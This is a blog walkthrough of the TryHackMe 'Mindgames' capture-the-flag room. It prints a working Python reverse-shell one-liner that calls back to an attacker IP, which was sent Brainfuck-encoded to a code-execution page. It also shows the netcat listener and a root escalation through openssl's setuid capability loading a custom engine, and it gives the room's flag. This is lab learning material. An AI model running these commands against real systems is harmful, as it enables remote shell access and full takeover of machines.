Featured image of post TryHackMe: Mindgames Writeup

TryHackMe: Mindgames Writeup

Get brainfucked in the easy room. Exploit a rare OpenSSL exploit to get root.

Play

1. Scanning & Enumeration

We do the below scans in parallel.

1.1. Port Scanning

Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 24:4f:06:26:0e:d3:7c:b8:18:42:40:12:7a:9e:3b:71 (RSA)
|   256 5c:2b:3c:56:fd:60:2f:f7:28:34:47:55:d6:f8:8d:c1 (ECDSA)
|_  256 da:16:8b:14:aa:58:0e:e1:74:85:6f:af:bf:6b:8d:58 (ED25519)
80/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Mindgames.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nothing too special here.

1.2. Web Enumeration

I tried enumerating other directories in the website, but I did not find anything.

1.3. Web Exploration

webserver

This looks like the brainfuck language. Using a decoder here. Decoding the first one, we get the resultant: print("Hello, World")

The second one is:

def F(n):
    if n <= 1:
        return 1
    return F(n-1)+F(n-2)


for i in range(10):
    print(F(i))

both look python3. So … could we put a python3 reverse shell?

2. Foothold

I tried putting a vanilla python3 line, but it did not work. So, I tried encoding it first with brainfuck using this tool.

encoding encoding

it works! works

Get a reverse shell. I used the one below.

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.17.8.184",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")

Listening on a port.

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 4444                               
listening on [any] 4444 ...
connect to [10.17.8.184] from (UNKNOWN) [10.10.28.151] 37062
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
mindgames@mindgames:~/webserver$ 

We are in!

3. PrivEsc

Upgrade the shell: python3 -c 'import pty; pty.spawn("/bin/bash")'

I took some time enumerating and I found the below using linpeas.sh.

Files with capabilities (limited to 50):
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/openssl = cap_setuid+ep
/home/mindgames/webserver/server = cap_net_bind_service+ep
/home/mindgames/webserver/server = cap_net_bind_service+ep is writable

The /usr/bin/openssl = cap_setuid+ep looks very interesting. Look at my blog here to figure how to use it. Running,

mindgames@mindgames:~/webserver$ openssl req -engine ./openssl-engine.so
openssl req -engine ./openssl-engine.so
root@mindgames:~/webserver# id
id
uid=0(root) gid=1001(mindgames) groups=1001(mindgames)
root@mindgames:~/webserver# cd /root
cd /root
root@mindgames:/root# cat roo
cat root.txt 
thm{yee_haww}
root@mindgames:/root# 

And we are done!

Built with Hugo
Theme Stack designed by Jimmy